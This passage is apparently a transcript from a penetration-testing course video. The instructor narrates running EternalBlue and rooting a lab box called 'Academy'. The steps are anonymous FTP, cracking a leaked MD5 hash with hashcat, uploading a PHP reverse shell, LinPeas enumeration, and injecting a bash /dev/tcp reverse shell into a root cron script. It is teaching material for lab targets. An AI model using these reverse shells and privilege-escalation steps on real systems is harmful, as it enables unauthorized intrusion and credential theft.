handler for us already. It's just using a shell reverse TCP instead of a meterpreter reverse TCP here. So last thing we're going to do is run the exploit. So we're just going to say Python eternal blue like this exploit, and we're on 7.py. Our target is 192.168.138.135. Path to shellcode is just shellcode and then scall.bin. And we do not have to provide a number of Groom connections. That's optional. We're going to run this and we'll cross our fingers. You never know. Might work. Doesn't look like it's working. We blue screen the machine. So this is a perfect example of why you just don't willy-nilly run this in an environment, okay? So a good lesson learned, honestly, because if you're in a critical environment, you have no idea what that machine does. Imagine if this was something in a hospital controlling equipment that was being used during surgery. Who knows? If you took that down, it could be very, very, very bad. So it's good to see the other side of it. Again, get permission before running something like this, unless you know that your environment's safe. It's okay to take down some machines, etc. But usually that's not the case. So with that, we're going to go ahead and move on to the next machine. Hopefully you got this and got through the walkthrough just fine. So I'll see you in the next machine as we walk through that and hopefully take down another box. Okay, in this video, I'm going to show you how to quickly open up the Academy machine in both VMware and VirtualBox and how to set it up. After this, you should have seen a Linux setup and a Windows setup, so you should have no more issues setting these up. I have full faith in you beyond this, so repeat the process. If you need to go back and watch the video, just come back and watch one of these. Anyways, we're going to open a virtual machine. If you are in VMware, I'm going to go into my folder that has it, Capstone, and I'm going to go to Academy and just double click, open that up. It's going to ask me where I want to put it. I'm going to go default settings. You can choose wherever you want. I'm just going to hit import. It's going to take a minute to import. While that's happening, I'm going to show you, and you might see a retry. Just go ahead and hit retry on that. It should work. While we're waiting, I'm going to go ahead and show you the other side of things, which is VirtualBox. Go ahead and hit File. Go ahead and hit Import Appliance. And then just go select your file. I've got it for copy paste purposes. It's a lot easier. And VMware thinks it can just take over. It's wrong. So in here, make sure you just have your OVF file that you downloaded. Hit next. And then come in here and you're going to see these settings. You can go ahead and just run the default settings for now and just import. We'll change the settings once we have it imported. So go ahead and import that. On VMware, we're just going to ping pong back and forth real quick. Under the settings for the Academy, go ahead and just hit Edit Virtual Machine Settings. In here, this is a Linux machine, so 1 GB of memory is fine. We don't need a lot. Come to your network adapter and make sure that it says NAT and not bridged. Hit OK. Go ahead and log in. Now you can power on this virtual machine, get that going. In the next video, I'm going to show you the password, which is just root TCM. Same thing here on the Academy. Go ahead and go to Settings. We're going to go to Network. Make sure your NAT network is selected. Remember, we created a NAT network. Make sure your NAT network is selected and that you are on the same network as your Kali Linux machine, or you will not be able to communicate with it. So with that out of the way, you can go ahead and power this on, depending which one you're on. Catch me in the next video when we will talk about logging in, finding the IP address, and getting started with attacking this machine. I'll catch you over in the next video. All right, on to the next machine. This one is called Academy, and this was created by Alec, especially for us. Now we're going to attack this machine and we're going to get a low-level user. We're going to pivot into a second low-level user, and then we're going to root this machine. If you did not root this machine, do not stress about it. These boxes are meant to be hard if you are a beginner, and you are meant to walk through with us and see all these different techniques, tips, and tricks, and just the idea and mindset as well. So do not stress if you are having issues trying this on your own. That's 100% okay. So I have imported the machine. You should be familiar with this. At this point, all I'm going to show you is how to log into the machine, similar to what we did with the Windows box. Now the password here, the username is root, the password is TCM. Tango Charlie Mike, okay? We come in, we're going to run DH client, hit enter. Okay, mine says file exists. That's because I already ran this. You go ahead and run it. It should take a second to load. Once that loads, go ahead and type IPA. And you should get an IP address back, okay? Mine says 192.168.138.129. Yours might say something incredibly different. But go ahead and go with whatever the IP address says here, because that's what you're going to use. Now, with that out of the way, I went ahead through the magic of editing and ran a Nmap scan. You're welcome to do this as well. -A, -P-, -T4, IP address. Nothing new at this point, okay? What came back for us was a few different things here. We have port 21 open, and we have a VSFTPD, say that 3 times fast, 3.0.3. And it says anonymous FTP login is allowed. Okay. It says, hey, there's a note.txt in here. Okay, that could be interesting. Now keep in mind, everything that we're doing in these machines is going to be very gamified, very CTF or capture the flag. And that's exactly what we're doing, is we're capturing the flag. So don't stress about this being incredibly realistic at this point. We're going to get into the more practical stuff as we get into the Active Directory pen testing section. We're really just trying to focus on some of the basic concepts and some of the things that you'll see if you go do any CTF events or you go on to any other certifications or anything like that. So this is a good introduction, kind of jump into the pool, maybe get your feet wet first into hacking. So with this in mind, we've got port 21, we've got port 22, we've got port 80. Now, 80 is a web server, 22 is SSH. My strategy here, when I see port 22, I immediately erase it off the board. Now, that's not to say that it couldn't have an option of attack here. You could brute force it. You could go in there and try like a root username, or if you knew other usernames, you can go in there and just try to brute force the password, and maybe you get lucky and log in. Usually on CTFs, that is not the intended route. Now, for things like, say, example, a pen test, you might want to brute force SSH because there's a couple reasons. One is there a weak password? Can I log in with a root user on a weak password for this machine? If so, that's bad. You tell your client, hey, this is bad. You're using weak passwords. Number two, you want to see if your client can pick you up, meaning, do they detect you when you are running brute force scans? If you have 500 attempts against an SSH login and you're still able to go attempt after attempt and nothing has been detected, you have not been prevented on that network, then that's an issue. You should probably bring that up to the client, say, hey, I ran a brute force against this login and you didn't detect me, you didn't see me do anything. We'll talk about that more in the report writing section and some of the things we talk about detection wise, but that's another example of something you want to test for and see if you're detected. You're testing detection throughout an entire pen test. So you want to say, hey, did you see me scanning? Did you see me brute forcing? Did you see me running exploits? Did your antivirus pick me up? Where was I caught during this pen test and where can you improve? So something about SSH, a little tangent there. But with that out of the way, port 21's open, port 80's open. Now we see down here that it says, hey, we're getting an It Works page, which means that it's just a default Apache 2 web server. We can go out to this web server and just take a look, 192.168.138.129. You can see this is just a basic, hey, It Works Apache 2 Debian page. That tells me that we're likely running on PHP on the back end, though that doesn't mean that entirely. This is just kind of an indicator. When we see Apache, I'm assuming PHP on the back end. So let's go back here. Now, we could do a couple things. We need to identify what's going on behind the scenes, because all we're seeing is a default web page, which, by the way, this is a finding on a pen test. So you would say, hey, this is just revealing too much information. Why do you even have this out there? Is this web server meant to be up? If it is, then take away this default web page and make it, make it say, hey, if you're not supposed to be here, then don't be here. Anything but a default web page, because all we're seeing is architecture here. If it's not supposed to be there, from a hacker's perspective, this means poor hygiene. you're just leaving ports open. You're just throwing computers on the network and on the internet willy-nilly, and this just means that you likely have poor hygiene, and we want to look into you further, because if this is something you're doing, you might be using bad passwords or not patching, etc., etc. So anyway, off that tangent, going back to the scan, I'm curious to know what the note says. We'll go check that out. We have anonymous login, so we'll start there, and then we're going to go ahead and take a look at the different pages that could be hiding behind the default page. So I'm going to leave this up, and now we're going to go take a look first at the FTP. So in here, I'm going to make this bigger. Okay, so FTP, all you got to do is 192.168.138.129, or whatever your IP address is. And then I like to just type anonymous twice. Okay, we get an anonymous login. We are successful. We can come in here and say ls. All right, and we have a note.txt in here. So all we need to do is type in get note.txt. That's it, and we're pretty much done. So the option here is we have FTP open. Now, there's a possibility that we could utilize this. So we have the ability with FTP to put files and get files. We just got a file. We can come put something on here. The only issue is we don't know where on this machine that this note.txt is stored. If for some reason this note file was stored in like the, I don't know, this Apache server, if we came in here and we just went like /note.txt and we saw it, all right, then that could be of interest, because we know the directory that we're in. We could come in here, just upload malware, come up here, execute the malware because we have execution, and then we could get a shell and keep pushing forward. But in this instance, we don't know where it is. There's a good chance it's not even in the web server. If for some reason it was in the web server, we could use that to execute, and that is a strategy that we might see at some point. But here, in this instance, unless I know where this is, the ability to put files in here does nothing for me. In a real world scenario, maybe we can go look at getting social engineering or getting somebody to open a file or something along those lines. But for here, for this capture the flag type style, we are only focused on getting this note, and that's pretty much it. Also, secondary finding on a pen test would be this, because we see Apache 2.4.38. It's telling us it's running a Debian server, which means we're attacking Linux. So if we were doing this blind, didn't know that, now we know. We know the Apache version, we know Debian. We're getting a little bit of information, and we're just compiling that information right now. Debian server, Apache, PHP most likely. Okay, all of this is information gathering, and that's all we want to do is gather as much information as possible. Now let's go ahead and exit out. And I want to just cat out this note.txt. Okay, so it says, hello Heath, Grimmy has set up the test website for the new academy. I told him not to use the same password everywhere. He will change it ASAP. I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command. All right, so we get looks like a database information here with values. Now it says the student regno number is what you use for login. So student regno here, you see this ties up to the first. And then we see student photo, and there's nothing in for the student photo. We see password, then we get password here, student name, okay, pin code going on. So this is pretty sensitive information. If this were on a pen test, which I've actually seen something similar to this, I've been on pen tests where I have seen open FTP servers. I've seen open web directories where they had backups of their entire website on there with database passwords and everything. It is it's realistic in a sense that you could run into something like this. It would be pretty bad. So anyway, this is coming from our friend J Delta, and we're gonna go ahead and just grab this password here. We've got this. Now the issue is this is likely not a password. This is likely a hash, and we can copy this and see first before we go down that route. This might be a password, but we can copy, and let's just take a quick look. We can go, let me cd back out of this here. We can do something like this. We can type in hash identifier like this and just hit enter. Okay, this is built into Kali Linux. You just go ahead and paste selection, hit enter, and this will tell you all the things that it thinks it is. This is saying, hey, most likely it's an MD5 hash. Okay, So we have an MD5 hash. Guess what? We can crack that hash. I'm going to go ahead and exit out of here with Control C. And if we go to Google and do a quick Google search, so I'll give you time to go do a Google search, but all you have to do is say hashcat, which is the tool we're going to use to crack this password, crack MD5 hash. Here we get a blog that says how to crack MD5 hashes. You go into that and it says, hey, in order to do that, you need to run hashcat -m for module and 0 with your hashes file, and then a password list like rocku.txt. So we haven't gotten much into hash cracking in this course, and we're going to talk about it a little bit. We'll talk about it a lot more when we get into the actual Active Directory hacking, because we start cracking passwords there, it becomes a lot more important. Here, we're just going to play around with it a little bit. So I'm going to show you this only this one time. I'm going to show you this on a Linux machine. This is running in a virtual machine here. Okay, so we're running hashcat. We're about to run hashcat in a virtual machine. Typically, we do not want to do this because hashcat is going to be running off of our CPU. Okay, it's going to be running off our CPU inside a virtual machine. That's going to make it run a lot slower. Hash cracking runs off of GPUs. Okay, so we're running off of our graphics card, not our CPU. So we want to do that. So when I run hash cracking in the real world, or even later in this course, you're going to see me running it on Windows because that is my base operating system. I will take that, I'll run it off there because it's going to use my GPU. It's going to use my graphics card. And that's what I want. So in this instance, it's going to go a lot slower, but because it's going to be an easy password to crack, we don't have to worry about it too much. But if you want to be good at cracking passwords and practice that, definitely make sure you're using it on your base OS, regardless of what it is, because it's going to crack a lot faster than running it in your virtual machine. So we're going to do a hashcat. Actually, before we do that, go ahead and type in locate rocku.txt. You should have it somewhere. Okay. You might have a tarred version of it or a gzip version of it. You can open that if you navigate to this folder, like user share, come in here to your folder, like literally go into browse network or file system and go into user share, etc. You can get there if for some reason you do not have rocku.txt. In the later version of Kali, they already have it here. So I'm assuming that it's here. If not, if all you see is a gzip, go ahead and just unzip that. Now, what we're going to do is we're going to say, actually, one more thing I forgot. You can go ahead and do a mousepad or gedit or whatever you want. You could do a hashes.txt. Copy and paste the hash. It's a little small probably for your screen from what you could see here. Copy and paste the hash into this hashes.txt, the one we got right here. Okay, make sure it's in a file. So once we've done that, go ahead and run hashcat with a -m of 0. That's a module. So we're going to be attacking the module of 0, which correlates to MD5 hashing. We're going to give it the file of hashes.txt, and we're going to give it a word list to run through of rocku.txt. Okay, and I'm going to scroll up just so you can see this. It's going to run. It might take a minute to run. It took me a couple seconds here. Gets through it pretty quick. Rocku runs fairly fast on a VM, and this one picked it up pretty quick. So the password of what's coming up is student. Password of student. Not very great password. Weak password policy. Okay, so we have a username. We have a user ID. We have a password of student, but we have no idea how we're going to do this. Okay, where are we going? Now, I can take some educated guesses here. Like, for example, they're saying, hey, this is for the new Academy, and this box is called Academy, and there's a good likelihood that if you were to do a /Academy on the web page, that maybe you find it, right? And we can go Academy and go find it, but I don't want to just show you and cheat. So let's go back and we're going to walk through it. We talked about directory busting with Dirbuster. I want to show you a couple other tools that we can use and show you the pros and cons of both of them. So open up a new tab. Make sure we're going to use two different tools. So I want to show you both. Go ahead and use a tool called Dirb, D-I-R-B. And for Dirb, all we have to do, I do believe, is just type in 192.168.138.129 and hit enter. So this is going to go off of the website. It's going to run on its own word list. It's going to go in here and try to find stuff. Immediately it found phpMyAdmin. The issue is with this, it's just going to go in and start like going into the phpMyAdmin and looking for directories, and it's finding all kinds of directories, and this is going to take a minute. So this is one way of doing it. Another way of doing it is using a tool called FFuff. I don't know how you say it. FFuff, whatever, everybody's got their own pronunciation. If you do an apt install of FFUF like this, you hit enter. I already have it, but yours should pick it up. Okay, we're gonna run the tool just like this. So we're gonna say FFUF once yours is installed. Do a -W, that is for word list. And your word list should be in user, share, word lists. And we can do Dirbuster, that's fine. This is where all the word lists are. And then I just like to double tab or tab around, and we're gonna use the medium word list. That's my go-to for most cases. We could use the lowercase if we wanted to. I think either are fine, okay? From here, gonna go ahead and back up. And now what I'm gonna do is I'm gonna put a colon here, and I'm gonna type in fuzz. Okay, this is what we're gonna fuzz. We're gonna do a -U, and we're gonna do HTTP 192.168.138.129, and we're gonna say /fuzz. So what we're telling this is, hey, with this word list, we're gonna be fuzzing with this word list. We're gonna fuzz this parameter right here. This is exactly what we're doing. Okay, we're gonna hit enter. And this is immediately going in and just doing all that we want to do. It found Academy right away, phpMyAdmin right away, and this is very fast. Found a server status, and all it's doing is looking one thread deep. So it's not doing what Dirb is doing. Dirb is going and saying, hey, I found phpMyAdmin. Now I'm going to go through and find every single directory inside of that and every single directory inside of those directories, which can take a while. This one is saying, I'll find all the first level directories, and if you want to go search those, you can. Like we could type in academy/fuzz. There's commands in here that we can do to take this further. We can limit which response statuses we want. Maybe we only want 200s, or maybe we want 302s, depending on this. So maybe we don't want any 401s or 403s or 405s. We only want the ones that come back as 200 guaranteed. So in this case, we're looking like we got a 301 from Academy, so there's a redirect there. Same with the phpMyAdmin. All right, so with that in mind, this is how you can find it. Found it quick. This one's still going. There's different strategies, different tools, everything else. This one's pretty nice. There's a lot of tools that come out for directory busting all the time. Latest ones are being built in Rust, which is interesting because Rust is really fast. There's ones built in Go because Go is really fast. So you pick your poison on a directory busting tool and you just run with it. So anyway, we're gonna go ahead and enter in that registration number. So you can go ahead and just come copy it from here. And then you're gonna go ahead and paste that. And then the password is student. For me, I've changed the password in here because I've already gone through this box, but you'll be brought to a change password screen. So you could type in student, change it if you want to. You really don't have to. You can come in here and start clicking through, hey, I want to enroll in a course, enroll history, my profile, change password, etc. So this is really what we have. Now, the interesting thing in here is that we have this upload photo feature. So if we look at this, we can come in here and say, okay, how do we want to attack a website? What are some ways that we can get code execution? We might be able to perform like LFI, RFI attacks on this and pull down information or execute code. Maybe there's SQL injection somewhere in here. We can pull down and dump the database. We did see a phpMyAdmin. Maybe there's more behind this, behind the scenes that we can do. We can also go out, and something that we didn't really look at on the first scan is we can do a version check. Like we didn't check on this version to see if there's a vulnerability there. That would be something you can do. Same with the OpenSSH, same with the Apache. You can go and do those. I'm only not showing you that because I'm saving time here, but the correct methodology would definitely be to go check these as well to see if there's any vulnerabilities. Now, there is in here this is a online registration. You can look and see if there's any way to pull down like viewing the source and see if maybe anything in here would tell you, hey, what CMS is this? What is this built off of? Because clearly this is a CMS of some sort that they've used. Now, with that in mind, we can go back and we can kind of just look and see if we can find anything. The first thing we might want to do is just come in here and do a browse and come and say, okay, I'm going to upload, let me go to my desktop. I'm going to upload a picture of a dog. You don't have to do this. I just want to see if it works. Okay, so I uploaded a picture of a dog. Perfect. Now, the question here is, and by the way, we could see up here that PHP is in use. I'm going to make this a little bit bigger, by the way, but PHP is in use. It should say my-profile.php. What we want to do is we want to see if we can upload a file that is not a dog. Okay, like not a JPEG, not a GIF, not whatever, PNG. We want to see if we can upload something that's not a photo and abuse the file upload system. If they're doing no checks here and we can just upload this, they are in big trouble. So what we can do is we can right click and go, we can view image, which will tell us kind of where the image is stored. So it's stored in Academy student photo / and this is dog.jpg, which is what I uploaded. So what we can do, let me refresh this. What we can do is try to upload a reverse shell here and see if we can't get a connection back by viewing this. Let's see if we can upload something malicious. Now we know this is Apache, so we're going to upload via PHP. So I'm going to go ahead and do that. What I want to do is go out and we're going to do a quick search. We're going to go to Google and we're going to say PHP reverse shell. And there is a great one out there from Pentest Monkey. Okay, first hit should be up here. There's other ones that you can use. People have their preferences and their favorites. This one is 6 years old and still works perfectly. So all we're going to do is go raw here and copy this. Control A, Control C, very quick. And what I did was I went ahead and put this into a file here. So let's go ahead and clear screen. You can just do mousepad, gedit, nano, whatever you want. Actually, I might nano this just so you can see. But I called this shell.php. And then I pasted it in here. That's all you got to do. Shell.php, paste it in here. I'm going to scroll down a little bit. You're going to get to this little part after the comments. And you're going to see, hey, it says change this, change this. You need to put in your IP address. Whatever your IP address of your attacker machine is, that needs to go here. So if you need to open up a new tab, come in here, do IPA or ifconfig, 192.168.138.131. Come back. That matches what I've got. 1234, in my opinion, is fine. You can leave it as is for this machine. So, Control X. This is fine. You can hit yes, save if it asks you to. Just hit Y and enter, and that will save your shell.php. So we have shell.php. We need a listener. We're going to do a reverse shell here. So 1234 on the NVLP on Netcat. This should not be unfamiliar to you. You should already be aware of this. So we're going to go here, and now we've got this listening. We're waiting for something to happen. So we're going to go back into this, and we're going to upload this malicious file. So I put this in my root folder, shell.php. Click update, come in here. You can see nothing's happened. Let's see if it tries to execute. Oh, it already executed. So we don't even have to go to, like, we don't have to right click and go to that that location. It already executed that file when it loaded this page, which is crazy. So we have a shell here, which is great. So if we do a who am I, you can see we are the www-data user. So we are not an admin on this machine. We are not root. We can do a sudo-l, but they rudely took away sudo. We could type in which sudo and see if it's there. Locate sudo. Maybe they put it somewhere else. Locate not found either. So they're playing a little bit of games with us, just a little bit, because we should be able to run and see, hey, what privileges do we have as sudo? But it's not there. That's okay though. We're still going to be fine. So what I want to do next is we land on a machine. We're not a root user. We need to perform privilege escalation. This is where things get fun, and this is where we're going to take a bunch of winding roads to get to where we're getting. So what we're going to do now is we're going to use a tool called LinPeas, and we're going to utilize that to do some searching. LinPeas is a automated tool that goes out and does basically hunting for any sort of privilege escalation. And I kind of cheated a little bit. Let me go to Google and just type in literally LIN, like Linux, PEAS, like the food, peas. Hit enter. You'll see it here in GitHub. And you see a linpeas.sh updated 3 days ago. Nice. All right. And this is going to go through and perform all kinds of checks to see if there are any escalation privileges or privilege escalation or paths for us with privilege escalation, what I should say. So you can go in here, again, raw, Control A, Control C. And what I like to do, and this is how I actually operate, is I like to make dir on a transfers folder. I call it transfers. And I've already got one, so I'm just going to cd into transfers. Or transfer is fine as well. ls in here, and linpeas.sh is already in here. So you can nano linpeas.sh, same thing. Just go ahead and get it into this folder and have a nice little transfer folder. Make sure you copy, paste it, put it into a file, and have it ready to roll. So what we're going to do is we're going to host up a web server. So we're going to say Python 3-m for module, and we're going to type in http-server 80. Okay, and this is going to host up a web server in this folder. We're going to go and grab this file on this machine. So a good place to put a file that we want to dump on this machine is we're just going to put it right into the temp folder. So cd into temp, print working directory. We're in /tmp. Okay, so what we're going to do now is we're going to do a wget http your attacker machine IP. So I'm at 131 /linpeas.sh. Hit enter. It should copy over. You could see it coming through. Do a quick ls. I already had linpeas on here because I was running through this box earlier, but I'm going to use the original linpeas. So pretend with me. We need to make it executable. chmod +x, or change mode, linpeas.sh. Okay. Now we're going to run it. ./linpeas.sh. Just like that. Hit enter. It's going to start just flying across the screen. It might take a minute to go through. We're going to go through some of this, but I'm going to give you the general gist of what you're looking for and the things that you want to look for in here. So I'm going to take this and scroll back up to the top. If yours isn't done running yet, that's fine. I kind of just want you to watch anyway on this one. So we run it. We get a nice little Ninja Turtle. Cute. And you go through and it tells you the legend on here, okay? And it says, hey, red, yellow means 95%, could be a privilege escalation vector. Red, you should look into it, and then it gives you different ones. So really, we're looking for red, and we're just trying to see if we can find anything in here that could be of interest for us. Now, as we're scrolling through, it gives us information about the, the Linux distribution, the release, all that. That could be useful if we have some sort of escalation against this. There are different types of escalation that we could use, and the release information could be important to us, though it is not for this machine, so we're going to skip over it for now. You go through, it tells you all kinds of stuff about the all the operating system, what's running on it, and it's looking for anything that could be of interest. Now it's telling you, hey, what do we have that we can run? This just says, yes, this is a virtual machine. Keep going through, keep going through. This is looking at cron jobs, which we'll talk about in a little bit. This is looking for any sort of systemd timers or cron jobs. We have no cron jobs running that look relevant to us. This is just running Apache 2. This is running a, and this actually looks like it could just be the processes running, not even the cron jobs. So these are just the processes running. Nothing of interest to us right now. Scrolling through here, we're just going to look and see if we find anything of interest. Now there is a highlighted red and yellow here with home grimy backup.sh. We're going to copy that bad boy, see what it is. And then from here, you're going to go ahead and just keep scrolling. So we come through, keep scrolling, keep scrolling. And a lot of this is just information that is provided with us. What is of interest, and for this machine now, you're welcome to read through this. There's a lot of data to read through. I like to scroll through kind of really quick and just see if anything stands out. Not at this pace, but like right here, look, we're scrolling through and we see, hey, there is a MySQL password of my very secure pass. That is of interest to us. It looks for passwords, and we're going to scroll down to the bottom. I'll show you kind of what it looks like. So if we scroll all the way down, we start scrolling up a little bit, you'll see that the my very secure pass shows up again. It shows up right here, and it tells you, hey, this is in this includes config.php file. So that's really what we're looking for. We've got a password up here, manage students at 12345, so we can go look at that if we wanted to. And some things in here that we want to make note of. So maybe we open up a notepad, like we come into a text editor, we just do a paste here because the Grimmy's of interest. We found the password of my very secure pass, which maybe we want to just copy this whole thing out. Okay, and I might put that into my little notes as well. And maybe I want to read this document and see what's in here as well. So this is of interest. We want to go through and just see anything of interest. Now, I am skipping ahead just a little bit only because to save time for the video, there will be other opportunities to learn privilege escalation. And again, we have the privilege escalation course if you want to go through this in more detail. This is, again, just trying to get your feet wet, introduced to the idea, and understanding what we're doing here. So now let's go ahead and let's look at the file that we just found first. We'll wait on the Grimmy file. Let's go ahead and just cat this out. Okay, so if we cat out this config.php, we see that we get a SQL user of Grimmy. We get my very secure pass. Okay, we get some information there. So we can maybe try to see if this works for us anywhere. It's a SQL user database. Maybe we can get into the SQL database and find some information. That is one option, though I did not see any sort of information for SQL unless we could log into PHPMyAdmin with this on that web panel that we were looking for. So that's something that could work. We also want to see if there's anything. Maybe we go cat Etsy password, see if that works for us. Okay, so Etsy password is showing us all the users on the machine. Of interest, we like to scroll down to the bottom and we see a user of Grimmy. And it says Grimmy's an administrator, which is interesting. So it's pointing to Grimmy being a user on this machine. So it doesn't hurt to just copy this password and see what we can do with Grimmy. So what we can do here is I'm going to go ahead and just go to a new tab. And I'm going to cat. And by the way, we should have known that anyway, because there was a folder called home Grimmy backup.sh or home Grimmy. So Grimmy would have been an indicator anyway that that we were up against a user named Grimmy. So we do SSH, we can do Grimmy at, and this machine is 192.168.138.129 for me. Go ahead and hit enter once you got it in there. And it should ask you your first time about a fingerprint. Just type in yes, hit enter, and then go ahead and paste in that password that we just got. And maybe I copied it wrong, so I'm gonna go copy that one more time. Okay, and here we go. So now we are in this machine. We don't have sudo access, I don't believe. Sudo-L. Again, it says sudo not found. It could be that we have a broken version of bash or they intentionally removed it because it's just CTF. That's one of the first checks I do. History is another check, though I have some history in here from myself. So you might not have any history when you come in here. This is just all me doing this. Now, one thing that I do, again, is I like to come in and I like to download LinPs, run it again, see if anything's changed. I'm going to skip over that process, but I'm just telling you for the process. What we want to do is we want to make sure we look at the file that's of interest. Okay, so that file, when we went and saw, was in the home Grimmy folder. So let's just go ahead and cd to home Grimmy. And we're going to ls in here. And all we have is backup.sh. So let's run cat backup.sh. So what we have is, it looks like it's removing a temp backup file, .zip. It's zipping up a backup.zip from this var HTML Academy include. So it looks like it's doing a backup of the Academy, and then it's changing the permissions of the temp file. So if we look at temp, there may or may not be a backup.zip sitting in there. So what this is telling me is this is probably going out there and doing periodic checks, or a script is running periodically to see if, or to perform this backup. So it could be running every hour, every day, every week. We don't know what it's running. Now we can see if by chance we have access to that information. When we were looking at the cron information from LinPeas, I didn't see it in there. We could also do a cron tab -L to see. Here we have no cron tab for Grimmy. So what's happening possibly is that Grimmy doesn't have the cron tab. We can try to see if we can cron tab of a user, look at root and just do a -list, but it says you must be privileged. So we have to run sudo, but we don't have sudo. So we won't be able to switch into root to use that as well. We don't have privileges to do that. So without having any cron tab information or seeing it running when we looked at the cron, we could do a cron tab -E as well. I just don't, I mean, there's nothing in here. So this isn't giving us any indicator. And a cron job is something that will run for us, by the way. And we tell it, hey, I want to run this script every hour, every minute, every day, every week. We could tell it when we want it to run. So this is a realistic scenario in that sense, that cron jobs are used in administration. So from here, if we don't have that, there's something else called a system D timer. We can look at that from systemctl and just say list timers and come through like this and see if there's any script in here running that's in a timer. And I actually don't see anything here. You can hit Q for quit and that'll exit this. So when we have this situation, there's a tool that we can use out there that will actually give us more information of what's running with the processes than what is leading on. Remember, we ran a PS with the we ran PS for everybody with the script, the LinPeas. We saw it. We didn't see anything in there that was any indication of this backup.sh. So if we want validation and confirmation that this is running on a timer, we can go ahead and go out, and there's a tool out there that is pretty neat. It's called PSPy, PSPY. And all you have to do, literally all you have to do, Google this, by the way, I'm gonna do it just so we could say we did it. PSPy, literally the first thing that comes up. So in here, what you wanna do is go ahead and download the 64-bit static version. And when you download that, you might get put into your downloads folder. All you have to do is, we'll open a new tab here real quick. All you have to do is do a move command, if you don't remember. So move, downloads, PSPy, and then just put that in your transfer /PSPy, okay? PSPy 64 is actually what it's called. I'm just winging it here. I've already got it in my folder, but make sure you move it over to your folder. Or if you want to keep it in downloads and run from there, that's fine as well. Just note that I already have this in my folder here. So all you have to do now is cd over to your temp folder. If ILS, I've got some stuff in here. Looks like LinPeas backup.zip is sitting in here. What I'm going to put in here is this PSPy, and we're going to run it. So I'm going to do a wget. And remember, I already have my listener for my web server running from earlier. So this is just going to be a simple grab and go. And this is PSPy 64. Grab this. All right, ls chmod +x on PSPy 64. And we're going to run it. Now, what this is doing is showing us all the processes running on the machine. All of them. And we could scroll through this and kind of see, and yours is going to look different than mine. Don't worry about the PID numbers. Don't worry about the timing. Don't worry about anything like that. All you got to do is scroll through here and see if we can see that backup.sh running. And we can come through, see if there's anything in here. And look, now it showed up, backup.sh. I don't think that was there before. So what happens is it just waits for this to run, and then when it runs, we're seeing it come through here. So that looked like it just ran. If we wanted true confirmation, we could sit here and wait another minute and see if this runs, because my hunch is it's running every minute because this is capture the flag box. So we could do that. I'm going to tell you that it is running every minute, so we don't have to do that, just to save a little bit of time. So Control C, get back into your Grimmy at Academy. And now we are going to abuse this in our favor. Let's go ahead and go to CD, home, Grimmy. We're going to go back, make sure you have your backup.sh in there. And now what we're going to do is I want you to go to Google, and you go and say bash reverse shell one-liner. Okay? And there is a reverse shell cheat sheet from Pentest Monkey. You could also type that in. Click on that. Here you will see right up front, you will see bash-i. You're gonna see this right here. This is a one-line reverse shell. This is awesome. All we're gonna do is put this into a shell script, which we already have. We have it right here. We're gonna put that in there, and when it executes, it's going to perform reverse shell. So what we wanna do is we wanna modify this a little bit. So let's go ahead and open up a notepad real quick. It might be a little bit small on your screen for you, but what I'm doing is I'm putting in where it says 10.0.0.1. I'm putting 192.168.138.131, which is my attacker machine, and I'm going to change the IP address to 8081, or to the port to 8081. You are more than welcome to keep it at 8080. I'm just doing this because I ran through this once earlier, and there's a possibility that port is still out there lingering. So just for the video purpose, I'm changing it to 8081. So what does that mean I have to do? Netcat, NVLP, set up that reverse shell listener. And here's what's going to happen. We're going to come in here and we're going to say nano backup.sh. You can come in here, tab down a couple times, and if you hit Control K, it deletes a line. That's some magic if you didn't know it. And you can come right click, paste selection, maybe paste clipboard. Okay. And what we're going to do is this is going to execute bash-i dev TCP 192.168. It's going to call out to our IP address with this. And if our hunch is correct that this is running as the root user, we're going to get a root shell on this. So what's happening is this cron job is out there. It's running as root. It's executing as root. And when it executes that script, it's going to execute as a root shell, which it just did. You could see root at Academy. Who am I? Okay, so let's CD to root just for the fun of the game. Maybe CD root ls. Okay, and then cat flag.txt. Says, congrats, you rooted this box. Looks like this CMS isn't so secure. I hope you enjoyed it. If you had any issues, please let us know in the course Discord. Happy hacking. Great. That was an example of a box with a couple of pivots, a couple of different privilege escalations, and very gamified, very capture the flag. You will likely never do most of this on a pen test ever in your life, but it's still important to learn from the hacking process as we build up into this and then as we get into more of the Active Directory stuff. So that is it for this video. We're going to go ahead and call it here, and I'm going to go ahead and catch you in the next one. Okay, on to the box dev. Now let me preface this with it is raining pretty bad here, so if you hear thunderstorms or anything in the back, consider it part of the ambiance. But we're going to do another box from Alec. Thank you, Alec, for creating this wonderful machine. And this box is a Linux machine, so you should already have it set up. We're past the setup stage. You should know how to set it up. Come in here. I already have an mmap scan ran against it. So if you do not have an mmap scan ran against it, you should go ahead and do that. Pause if you need to. Otherwise, you could just follow along. So running the mmap scan, we could see that we have port 22 SSH. And remember what we said about SSH? Well, we're not going to look at it right now. It's nothing that's, at least in my experience, I've ever found an exploit for. So unless we have credentials or something for that, we're not going to get into SSH. We have something on port 80 called Bolt installation error for Apache web server. Okay, that's an indicator this might be a Linux machine already because we're seeing Debian. That's a nice indication. We have RPC bind, which we can enumerate RPC, though it's not that advantageous for us right this instant. That gets into more advanced stuff. Honestly, as a beginner, we're going to leave RPC alone, though there is some information gathering that you can get out of RPC. As of right now, we're going to just kind of push it to the side because we've got more important things to focus on and more common things to focus on. So we have 2049 NFS, which is a network file share. Think of it like almost like SMB, like Samba for file sharing. This is a network file share. We can potentially mount to a file share here, so that might be of interest for us. We also have HTTP here for 8080. It just says connection Apache Debian PHP info page. We've got some Mount D and nlock manager. We're not going to worry about any of these ports. Which stand out to me are 8080, 2049, and 80. Okay, so keep those in mind. As you go through these more, as you get better at this, it'll be easier for you to understand which ports you're looking for, which ports you can kind of just throw to the side for now. So with that, we're going to go ahead and take a look at 80. We're going to take a look at 8080. Then we'll take a look at the network file share. So going out to the web page, I have Google open. I'm just going to go 192.168.138.137. Go here, and I'm also going to copy this and take this out to port 8080. And you can see that we have a couple of pages. One is a Bolt installation error page, which is interesting. We can come out and look at this. It looks like there's something called Bolt. We can actually go to the real web page here and see what's running. Bolt CMS. So we'll keep that in mind. Maybe they're running Bolt CMS. We could put that in our back pocket in our notes. It looks like there's an installation error. It's talking about the folder that should be installed in, which these are Linux folders. So this is more indication that we're likely attacking a Linux machine here. So we can do some research on this, but let's put that in our back pocket for now. Other website here is on port 8080. We're getting a PHP info page, which is nice. Sometimes this can disclose some information. You can actually read through this and see like here's the path, here's like the webmaster, here's the IP address that we're pointing at. So there's some different things in here that we can look at, and possibly if we were attacking this page, there could be some 